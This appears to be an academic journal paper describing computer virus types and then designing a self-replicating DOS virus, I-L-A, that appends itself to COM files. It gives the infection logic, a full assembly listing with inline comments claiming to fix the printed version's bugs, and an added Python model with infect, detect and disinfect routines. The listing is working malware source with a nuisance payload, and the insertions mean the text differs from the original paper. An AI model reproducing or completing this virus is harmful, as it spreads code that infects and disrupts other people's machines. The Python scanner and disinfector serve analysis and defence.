International Journal of Emerging Technology and Advanced Engineering
Website: www.ijetae.com (ISSN 2250-2459,ISO 9001:2008 Certified Journal, Volume 3, Issue 6, June 2013)
How the Virus Works in the Process

Dr. Ali Mohammed Ramadan
Misurata University – Misurata, Libya, Faculty of Science

[Figure (1): the virus code written at the beginning of the executable file, ahead of the original program]
[Figure (2): the virus code written over the original file data, which destroys the original program]
Abstract— This project is intended to give a general idea of computer viruses and, as its practical part, to design and implement a simple virus that attacks files with the extension (COM). The virus is written in assembly language (Assembly) and is named (I-L-A). Finally, the conclusions reached after the study are listed, together with recommendations that can be used in future by anyone who would like to repeat this study or to add improvements to the virus.
Keywords— Designed viruses, system controls, virus infection, Infect Procedure, Antidetection Procedure.
I. INTRODUCTION
Executable programs, system files (SYS), overlay files (Overlay) and libraries (Library) are the carriers of file viruses. To do its job of self-reproduction, the majority of viruses place their code either at the beginning of the file, as shown in Figure (1), or at its end, without changing the contents of the original file, because writing the virus code over the original data corrupts or destroys the original program, as shown in Figure (2): the virus code runs first, but since it has overwritten the executable it renders the host useless, and the virus cannot achieve its goal. When the infected program runs, the virus runs, reproduces and copies itself to infect other files.
Here the virus attaches itself to the end of the file and places a mark at the beginning of the file. When the program runs, this start mark transfers control to the virus program, which runs instead of the original program and then returns control to the original program, as illustrated in Figure (3).
[Figure (3): the virus code appended at the end of the executable file; a jump instruction at the beginning of the file jumps to the end of the file, the virus code runs and then jumps back to the beginning of the original program]
Viruses are designed for a particular type of executable file, since each type of executable file has a different structure: a virus designed to attack (COM) files cannot attack (EXE) files and vice versa, and neither (COM) viruses nor (EXE) viruses can attack system files (SYS). A virus can be designed to attack two or more types of file, but in that case it needs a different method of reproduction for each of these file types.
II. BOOT SECTOR VIRUSES (BOOT SECTOR VIRUS)
III. MACRO VIRUSES (MACRO VIRUS)
A macro virus spreads quickly through exchanged disks, through mail and through free software, since it infects the data files of the Office programs (Office applications) or Windows Help files, or attaches itself to the applications themselves or to other files. Macro viruses rely on applications that contain an embedded programming language, provided so that users can automate repetitive tasks by creating mini-programs (macros), for example the Visual Basic dialect embedded in the Office applications (Office application). When a document infected with this type of virus is opened, the virus becomes active and copies itself into other documents.
IV. TECHNIQUES USED BY VIRUSES TO AVOID DETECTION
Each of the types of virus reported in this study uses one of the following techniques to hide its presence and make detection somewhat difficult:
1. Deception (Stealth): viruses use effective camouflage to hide their presence. For example, when an attempt is made to read the boot sector of a disk infected with (Brain) while the virus is active in memory, the original sector is presented rather than the infected one; likewise the file-infecting virus (Frodo) cannot be detected while it is active, because it removes the infection from any file that is about to be read.
V. THE COMPONENTS OF A COMPUTER VIRUS PROGRAM
Any computer virus that is to proliferate must consist of at least two major parts (procedures) before it can even be called a virus. These procedures are:
• Search: the virus must contain a search procedure (Search procedure). This procedure identifies the locations to which the virus will copy itself, and it also determines how fast the virus reproduces (quickly or slowly).
• Copy: the virus must contain a copy procedure (Copy Procedure) that copies the virus into the locations identified by the search; the smaller this procedure, the better the virus performs. Through these two procedures the virus achieves its objectives.
• An anti-detection procedure (Antidetection Procedure) can be added to protect and hide the virus, so that neither the user nor anti-virus programs can discover it.
The three preceding procedures are the necessary components of a working virus. Some viruses contain other procedures intended to disrupt or sabotage the work of the computer, to display messages, or to take other actions when the virus executes. These are neither necessary nor essential, and may even be harmful to the virus itself because they attract the user's attention.
VI. THE (COM) TYPE OF EXECUTABLE FILE
A (COM) file is small, with a maximum size of 64 KB (the capacity of one segment), and uses the same segment to store the program's instructions and its data as well as the stack (Stack). In this case the values of the four segment registers (the code segment (CS), the data segment (DS), the stack segment (SS) and the extra segment (ES)) are all equal, i.e. they all point to the same segment.
When a request is made to run a program of type (COM), the operating system first checks how much free memory is available to see whether it is enough to load the program. If the capacity is sufficient, the operating system reserves space in memory and sets a pointer to that space so that the same area is not allocated to another program when one is executed. The program is then loaded into that area, preceded by the program segment prefix (PSP), which occupies the start of the region from address (0H) to (100H). The program segment prefix "is a method inherited from the old (CP/M) operating system of reserving the first 256 bytes of memory to hold some basic information for the operating system" [2]. Address (5) in the program segment prefix contains a far call instruction into the upper memory area where the rest of the operating system components reside, which allows a program to reach the operating system's functions by calling address (5) in memory.
Once the program segment prefix has been created, the operating system loads the (COM) file from the disk into the location immediately following the prefix and, once this is done, hands control to the program. Before it does so, (DOS) has set certain CPU registers to predetermined values; the segment registers must be set up correctly or programs of type (COM) will not run. For a (COM) program this means CS = DS = ES = SS = the segment of the PSP, IP = 100H, and SP near the top of the segment with a zero word pushed, so that a RET from the program lands on the INT 20H at offset (0) of the PSP and terminates it.
VII. OVERVIEW OF THE VIRUS TO BE CREATED
The idea of the virus design
The virus reaches target machines through an infected (COM) file and infects other (COM) files without destroying the target file.
How the virus (I-L-A) works
For the virus to reside in a (COM) file and infect the rest of the files, it must first be able to receive control at some point during the execution of the program. The most appropriate point at which to receive control is the moment the operating system transfers control to the program itself, i.e. the moment immediately preceding the beginning of execution of the infected program.
Accordingly, the virus must occupy the first bytes of the (COM) file and replace them with a branch to the first of its own instructions at the end of the infected file; the virus can then execute its instructions and return control to the original program.
The following is a summary of the steps of the virus:
1. When a (COM) program file infected with the virus is loaded and executed, control of the CPU passes directly to the virus.
2. The virus searches for other files to infect.
3. It reads the first bytes of the file to be infected to make sure that the file has not been infected previously.
4. The virus copies itself into the file being attacked, and writes at the beginning of that file a branch instruction to the first instruction of the virus at the end of the file.
5. The virus copies the first bytes that it replaced with the branch to the end of the file, and then returns to the instructions of the original program and executes them.
VIII. SEARCHING FOR A FILE (FIND_FILE PROCEDURE)
For the virus to be able to search for the files it is designed to attack, it must know the way in which the operating system records file information. The operating system keeps track of every file stored on disk in two structures. First: the directory (Directory).
The directory contains records (Record) of 32 bytes each; a record describes a file or a subdirectory, and this description contains the name and extension, the size, the date and time of creation, and the file attributes (Attributes).
Second: the file allocation table (FAT).
The file allocation table is the index that describes the areas of the disk and indicates which of them are in use and which are free. The operating system controls access to files for reading or writing: it locates the desired file and opens it, and programs request this through the interrupt services. Interrupt (21H) is the user service interrupt; a program need only set the appropriate values in the processor registers, which represent the parameters of the call, and then issue the interrupt, as in the following example:

    mov dx, offset ffname
    mov ah, 4EH
    int 21H

Here the program searches for a file whose name matches the name in (ffname). Interrupt (21H) transfers control to (DOS) to do the job; register (ah) holds a number that tells the operating system what to do (here, search), and the other registers give it the further information it needs. The programmers of (DOS) provided a pair of search functions under interrupt (21H): the find-first function (4EH) and the find-next function (4FH). Both functions require the caller to place in memory a zero-terminated ASCII string (ASCIIZ) that names the file to search for; the string is a sequence of bytes whose last byte contains the value (null), for example:

    ffname db '*.com', 0

After placing the string in memory, (ds:dx) must hold the address of that location, (cx) must hold the attribute mask of the files to search for, and then the find-first function (4EH) is called. The name, attributes and size of the matching file are returned in the disk transfer area (DTA), which is why the virus later points the DTA at its own buffer with function (1AH) before searching.
[Scheme (1): flow of the virus (I-L-A): start of virus → search for the first file → if a file is present, check whether it can be infected → call the copy procedure → print the name of the infected file → search for another file; when no file is found, end of virus]
IX. CHECKING THE FILE (FILE_OK PROCEDURE)
After obtaining the name of the file to attack, this procedure decides whether the virus copies its instructions into the file or not. It is important to the success or failure of the virus, and serves three purposes:
1. It does not allow the virus to infect a file that has no room to contain the virus instructions, so that the file is not damaged without the virus achieving its goal of spreading.
2. It determines whether the file has already been infected by the virus.
3. It avoids the error of infecting a write-protected file.
In this procedure the file is opened for reading and writing by placing the value (2) in register (al) (al = 2). If the file's attributes mark it read-only, opening it fails and the operating system sets the value (1) in the carry flag ((CF), Carry Flag), and so the virus avoids infecting such files.
If the file opens successfully, the operating system returns the file handle (a number the system uses to access the file) in register (ax) and clears (CF). The instructions to open the file are as follows:

    mov dx, offset Fname
    mov ax, 3d02h
    int 21h

Once the file is open, the virus reads the first bytes of the file into a location in memory (register dx points to this location) using (DOS) function (3FH), which requires the number of bytes to read in register (cx) and the file handle returned by the open call in register (bx). The instructions to read from the file are as follows:

    mov bx, ax
    mov cx, 6
    mov dx, offset buf
    mov ah, 3Fh
    int 21h

The file size from the (Fsize) field is then placed in register (ax), and the size of the virus, obtained by subtracting the address of the first instruction of the virus (Begin) from the address of the last instruction (Final), is added to it together with (100H) for the area the system reserves for the program segment prefix (PSP) when the program runs. If this addition overflows register (ax), the file is too large to contain the virus instructions and be infected successfully: the processor sets (1) in (CF), so the check reports to the search that this file cannot be infected and another file should be searched for, by leaving (0) in the zero flag (Zero Flag, (ZF)) as follows:

    mov al, 1
    or al, al
    ret

If the file size is suitable for infection, it must be checked that the file has not already been infected, by comparing the first bytes of the file with the letters (I-L-A). If the file does not contain these characters followed by a branch (call), the file is clean and the check gives the search a positive signal by setting (1) in the zero flag (ZF) as follows:

    xor al, al
    ret
X. COPYING (INFECT PROCEDURE)
The virus uses this procedure to copy its instructions into the file identified by the search. The procedure opens the file for reading and writing with function (3DH), placing the file name in register (dx) and (2) in register (al) and calling interrupt (21H); the interrupt returns the file handle in (ax), which is saved at memory address (Handle). The virus then moves to the end of the file into which its instructions are to be copied, using function (42H), with the file handle in register (bx) and the appropriate value in register (al); the file pointer is moved relative to a position that depends on the value in register (al), as follows:
- If register (al) contains the value zero (al = 0), the pointer is placed at the beginning of the file.
- If register (al) contains the value (2) (al = 2), the pointer is placed at the end of the file.
The distance to move is given in (cx:dx), which is zero here, and the function returns the new position of the pointer, i.e. the file size, in (dx:ax); the virus keeps this value because it is the offset at which its own code will begin. Moving to the end of the file is done as follows:

    xor cx, cx
    mov dx, cx
    mov bx, word ptr [handle]
    mov ax, 4202h
    int 21h

After moving to the end of the file, the number of bytes to copy from the virus into the file is placed in register (cx), the memory address to copy from in register (dx), the handle of the file to copy to in register (bx), and the function number (40H) in (ah). The virus instructions are copied to the end of the file as follows:

    mov cx, es
    mov ds, cx
    mov cx, offset Final - offset begin
    mov dx, offset Vir_Start
    mov bx, ax
    mov ah, 40h
    int 21h

The virus then moves to the end of the file again in order to write, after its own code, the bytes that were read during the check (the first bytes of the file).
In the last stage of contaminating the file, the virus writes the 6 bytes at the beginning of the file: the letters (I-L-A) and a (call) instruction whose target is the address of the first instruction of the virus in the infected file. It then closes the file using function (3EH), as in the following steps:

    mov bx, word ptr [handle]
    mov ah, 3Eh
    int 21h
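The check of Section IX and the copy of this section, modelled in Python as an added example (this is not the paper's code; it works on an in-memory COM image instead of DOS file handles). It mirrors the three refusals of File_Ok and the three writes of Infect, and adds an is_infected() scanner and a disinfect() routine that puts the six saved bytes back. Two details deliberately differ from the paper's listing: the CALL displacement is computed as ii - 6, because a near CALL at address 103h is relative to 106h and the appended body starts at 100h + ii (the printed listing uses ii - 3, which lands three bytes into the body); and the RET is appended after all six saved bytes rather than written over the sixth, so the host is restored intact. The host image, the stand-in virus body and all function names are constructed for this example.

```python
"""Byte-level model of the I-L-A File_Ok and Infect procedures.

Added example, not the paper's own code: it models the DOS file operations
on an in-memory COM image (bytes) and adds is_infected() / disinfect().
The host image and the stand-in virus body are constructed for the demo;
every name below is this example's own.
"""
import struct

PSP_SIZE = 0x100      # the PSP occupies 0..FFh, so file offset k loads at 100h + k
MARKER = b"ILA"       # infection marker written to the first three bytes
CALL = 0xE8           # near CALL rel16 opcode
RET = 0xC3            # near RET opcode
HEAD_LEN = 6          # marker (3) + CALL opcode (1) + rel16 (2)
TAIL_LEN = HEAD_LEN + 1   # the six saved bytes followed by a RET

# Constructed stand-in for the appended virus code; only its length matters here.
VIRUS_BODY = bytes([0x90]) * 40

# Constructed host: mov dx,010Ah / mov ah,9 / nop / int 21h / int 20h / 'hi$'.
# Its first six bytes are whole, position-independent instructions, which the
# replay-then-RET scheme below relies on.
HOST = bytes([0xBA, 0x0A, 0x01, 0xB4, 0x09, 0x90, 0xCD, 0x21, 0xCD, 0x20]) + b"hi$"


def file_ok(image: bytes, body_len: int = len(VIRUS_BODY)) -> bool:
    """Mirror of File_Ok: True when the image may be infected.

    Refuses a head too short to patch, a program that would not fit in one
    64 KB segment together with the PSP (the paper's 'add ... / jc not_ok',
    here also counting the 7-byte tail), and a file that already starts with
    the marker or has a CALL at offset 3 (cmp word ptr [buf],'LI' and
    cmp byte ptr [buf+3],0E8h in the listing).
    """
    if len(image) < HEAD_LEN:
        return False
    if PSP_SIZE + len(image) + body_len + TAIL_LEN > 0xFFFF:
        return False
    if image[:2] == MARKER[:2] or image[3] == CALL:
        return False
    return True


def infect(image: bytes, body: bytes = VIRUS_BODY) -> bytes:
    """Mirror of Infect. Layout of the result (file offset -> address + 100h):
         0..5        'ILA' + CALL rel16            (patched head)
         6..n-1      rest of the original program  (untouched)
         n..n+b-1    the virus body, appended at the old end of file n
         n+b..       the six saved head bytes, then RET back into the host
    """
    if not file_ok(image, len(body)):
        raise ValueError("file cannot be infected")
    n = len(image)              # what the listing keeps in ii after seeking to the end
    saved = image[:HEAD_LEN]    # the six bytes File_Ok read into buf
    # The CALL occupies offsets 3..5 (addresses 103h..105h); the CPU adds rel16 to
    # 106h, and the body starts at 100h + n, so rel16 = n - 6.
    rel16 = (n - HEAD_LEN) & 0xFFFF
    head = MARKER + bytes([CALL]) + struct.pack("<H", rel16)
    return head + image[HEAD_LEN:] + body + saved + bytes([RET])


def is_infected(image: bytes, body_len: int = len(VIRUS_BODY)) -> bool:
    """Scanner view: marker present and the CALL lands exactly on the body,
    which sits body_len + TAIL_LEN bytes before the end of the file."""
    if len(image) < HEAD_LEN + body_len + TAIL_LEN:
        return False
    if image[:3] != MARKER or image[3] != CALL:
        return False
    rel16 = struct.unpack_from("<H", image, 4)[0]
    target = (PSP_SIZE + HEAD_LEN + rel16) & 0xFFFF
    body_start = len(image) - body_len - TAIL_LEN
    return target == PSP_SIZE + body_start


def disinfect(image: bytes, body_len: int = len(VIRUS_BODY)) -> bytes:
    """Reverse infect(): restore the six saved bytes and drop body and tail."""
    if not is_infected(image, body_len):
        raise ValueError("not an I-L-A infected image")
    body_start = len(image) - body_len - TAIL_LEN
    saved = image[body_start + body_len:body_start + body_len + HEAD_LEN]
    return saved + image[HEAD_LEN:body_start]


if __name__ == "__main__":
    inf = infect(HOST)
    print(f"host {len(HOST)} bytes -> infected {len(inf)} bytes, head {inf[:6].hex()}")
    print("reinfection refused:", not file_ok(inf))
    print("restored == host:", disinfect(inf) == HOST)
```

The replay-then-RET scheme assumes that the host's first six bytes are whole, position-independent instructions ending exactly at offset 6: they are executed at the end of the file and the RET then continues at 106h. A host whose first six bytes straddle an instruction boundary or contain a relative jump is corrupted by the infection, and File_Ok does not check for that; it is the first thing to verify when examining a sample that crashes after infection.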
Once the virus has carried out the preceding procedures (search for a file, check the file and copy), it performs the (destroy) action. Before returning control to the original program, the virus must restore the disk transfer area (DTA) to its original location at offset (80H) in the program segment prefix, as in the following steps:

    mov dx, 80h
    mov ah, 1Ah
    int 21h

The complete listing of the virus follows.

        .model small
        .stack 100h
        .code
Begin:  ORG 100h
; ***** copy the virus into the buffer (Vir_Start) in the data area *****
        mov ax,@data
        mov ds,ax
        mov es,ax                 ; ES:DI = Vir_Start, the destination of the copy
        mov di,offset Vir_Start
        mov [V_size],offset Final - offset Begin
        mov cx,word ptr [V_size]  ; number of bytes to copy
        push ds
        mov ax,@code
        mov ds,ax                 ; DS:SI = the virus code, which starts at 100h
        mov si,100h
        rep movsb                 ; copy the virus image (missing from the printed listing)
        pop ds
        call V_begin
; ***** destroy procedure (the payload) *****
destroy:
        mov dx,offset display1    ; print the message in display1
        mov ah,9
        int 21h
        mov ah,8                  ; read a key without echo
        int 21h
        cmp al,2Eh                ; '.'
        jne destroy               ; any other key: print the message again
        mov ah,8
        int 21h
        cmp al,2Eh                ; a second '.' in a row ends the loop
        jne destroy
        jmp Final
; ***** start of virus *****
V_begin:
        mov ah,1Ah                ; set the DTA to the virus's own buffer (DTA, in the data area)
        mov dx,offset DTA
        int 21h
start:
        call Find_File

; ***** return control to the infected program *****
Exit:
        mov dx,80h                ; restore the default DTA at PSP offset 80h
        mov ah,1Ah
        int 21h
        ret                       ; return after call V_begin
; ***** procedure: search for the first file *****
Find_File:
        mov dx,offset FFname      ; DS:DX -> '*.com',0
        mov cx,3Fh                ; attribute mask: any file
        mov ah,4Eh                ; find first; result goes to the DTA
        int 21h
FF_Loop:
        or al,al
        jnz return                ; no (more) files found
        call File_Ok
        jnz go_on                 ; file can't be infected
        call Infect
        mov byte ptr [Fname+12],'$' ; terminate the name for function 9
        mov dx,offset Fname
        mov ah,9                  ; print the name of the infected file
        int 21h
go_on:
        mov ah,4Fh                ; find next
        int 21h
        jmp FF_Loop
return:
        ret
; ***** procedure: check the file *****
File_Ok:
        mov dx,offset Fname
        mov ax,3D02h              ; open for read/write; fails (CF=1) on a read-only file
        int 21h
        jc not_ok
        mov bx,ax                 ; file handle
        mov cx,6
        mov dx,offset buf
        mov ah,3Fh                ; read the first 6 bytes into buf
        int 21h
        mov ah,3Eh                ; close; Infect reopens the file by name
        int 21h
        mov ax,word ptr [Fsize]   ; file size, filled in by find first/next
        add ax,[V_size]           ; plus the virus size ...
        jc not_ok                 ; ... would not fit in the 64 KB segment
        add ax,100h               ; plus the PSP
        jc not_ok
        cmp word ptr [buf],'LI'   ; first two bytes "IL": already infected
        je not_ok
        cmp byte ptr [buf+3],0E8h ; a CALL at offset 3: treat as infected
        je not_ok
        xor al,al                 ; ZF=1: can infect file
        ret
not_ok:
        mov al,1
        or al,al                  ; ZF=0: can't infect
        ret
; ***** procedure: copy the virus *****
Infect:
        mov dx,offset Fname
        mov ax,3D02h              ; open file for read/write
        int 21h
        push ax
        mov word ptr [handle],ax
        xor cx,cx
        mov dx,cx
        mov bx,word ptr [handle]
        mov ax,4202h              ; seek to the end of file; DX:AX = file size
        int 21h
        mov word ptr [ii],ax      ; original size = offset where the virus will start
        pop ax
        push ds
        mov cx,es
        mov ds,cx                 ; DS = segment of Vir_Start
        mov cx,offset Final - offset Begin ; number of bytes to write
        mov dx,offset Vir_Start
        mov bx,ax
        mov ah,40h                ; write the virus body to the end of the file
        int 21h
        pop ds
        xor cx,cx
        mov dx,cx
        mov bx,word ptr [handle]
        mov ax,4202h              ; seek to the end of file again
        int 21h
        mov byte ptr [buf+5],0C3h ; replace the sixth saved byte with RET: the tail
                                  ; replays the first five original bytes, then returns to 106h
        mov cx,6
        mov bx,word ptr [handle]
        mov dx,offset buf
        mov ah,40h                ; write the saved bytes after the virus
        int 21h
        xor cx,cx
        mov dx,cx
        mov bx,word ptr [handle]
        mov ax,4200h              ; seek to the start of file
        int 21h
        mov word ptr [buf],'LI'   ; marker "IL" ...
        mov byte ptr [buf+2],'A'  ; ... "A" (the marker write was missing from the printed listing)
        mov byte ptr [buf+3],0E8h ; near CALL
        mov ax,word ptr [ii]
        sub ax,6                  ; rel16 = ii - 6: the CALL at 103h is relative to 106h and the
                                  ; body starts at 100h + ii (the printed listing had ii - 3)
        mov word ptr [buf+4],ax
        ; write "ILA" + CALL at the beginning of the file
        mov cx,6
        mov dx,offset buf
        mov bx,word ptr [handle]
        mov ah,40h
        int 21h
        mov bx,word ptr [handle]
        mov ah,3Eh                ; close the file
        int 21h
        ret
; ***** virus end *****
Final:
; ***** exit from virus *****
        mov ah,4Ch
        int 21h
; ***** data area of the virus *****
        .data
DTA     db 1Ah dup(?)             ; first 1Ah bytes of the DTA; the next two fields complete it
Fsize   dw 0,0                    ; DTA offset 1Ah: file size (double word)
Fname   db 13 dup(?)              ; DTA offset 1Eh: ASCIIZ file name
buf     db 6 dup(?)               ; first six bytes of the file under examination
FFname  db '*.com',0
handle  dw 0
V_size  dw ?
ii      dw 0
display1 db 'Ibtesaam Laila Afrah','$'
Vir_Start dw 0                    ; buffer for the copied virus image (the copy runs past these two bytes)
        end Begin
REFERENCES
[1] Kip R. Irvine, Assembly Language for the IBM-PC, 2nd edition.
[2] Mark A. Ludwig, The Little Black Book of Computer Viruses, Volume 1: The Basic Technology, fourth printing, American Eagle Publications, Inc., 1995.
[3] Mark A. Ludwig, Computer Viruses, Artificial Life and Evolution (The Little Black Book of Computer Viruses, Volume 2), American Eagle Publications, Inc., 1993.
[4] Peter Szor, The Art of Computer Virus Research and Defense, first printing, Symantec Corporation, USA, February 2005.
[5] Yngve Ness, Norman Book on Computer Viruses, Norman ASA, February 2003.
[Scheme (2): flow of the procedure File_Ok: start of procedure → open the file for reading and writing; if the file cannot be opened for writing, it cannot be infected → read the first 6 bytes of the file and store them → add the file size to the size of the virus program; if the result is not a good size, the file cannot be infected → are the first 3 bytes "ILA"? if yes, the file cannot be infected; if no, the file can be infected → end of procedure]
[Scheme (3): flow of the procedure Infect: open the file for reading and writing → go to the end of the file and copy the virus instructions there → go to the end of the file again and write the 6 bytes read from the start of the file → go to the start of the file and write "ILA" and the call → close the file → end]